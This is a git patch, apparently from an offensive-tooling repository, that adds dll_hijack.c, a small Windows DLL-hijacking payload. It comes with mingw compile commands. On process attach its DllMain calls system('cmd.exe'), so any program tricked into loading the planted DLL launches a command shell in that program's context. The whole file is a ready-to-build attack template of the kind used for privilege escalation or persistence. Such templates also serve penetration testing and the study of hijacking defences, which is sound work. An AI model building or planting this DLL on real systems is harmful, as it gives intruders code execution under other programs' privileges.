From 4bf83d40291ed3942791759c740ee5541bf7092b Mon Sep 17 00:00:00 2001
From: heqnx <root@heqnx.com>
Date: Tue, 13 May 2025 21:46:34 +0300
Subject: added dll hijacks

---
 dll_hijack.c | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 dll_hijack.c

(limited to 'dll_hijack.c')

diff --git a/dll_hijack.c b/dll_hijack.c
new file mode 100644
index 0000000..547098e
--- /dev/null
+++ b/dll_hijack.c
@@ -0,0 +1,29 @@
+/*
+   Compile with:
+
+   i686-w64-mingw32-g++ dll_hijack.c -lws2_32 -shared -o hijack.dll
+   x86_64-w64-mingw32-gcc dll_hijack.c -shared -o hijack.dll
+   i686-w64-mingw32-gcc dll_hijack.c -shared -o hijack.dll
+*/
+
+#include <windows.h>
+
+void Entry () {
+    system("cmd.exe");
+    //WinExec("cmd.exe", 0);
+}
+
+BOOL WINAPI DllMain (HANDLE hModule, DWORD dwReason, LPVOID lpReserved) {
+    switch(dwReason) {
+        case DLL_PROCESS_ATTACH:
+            Entry();
+            break;
+        case DLL_PROCESS_DETACH:
+            break;
+        case DLL_THREAD_ATTACH:
+            break;
+        case DLL_THREAD_DETACH:
+            break;
+    }
+    return TRUE;
+}
-- 
cgit v1.2.3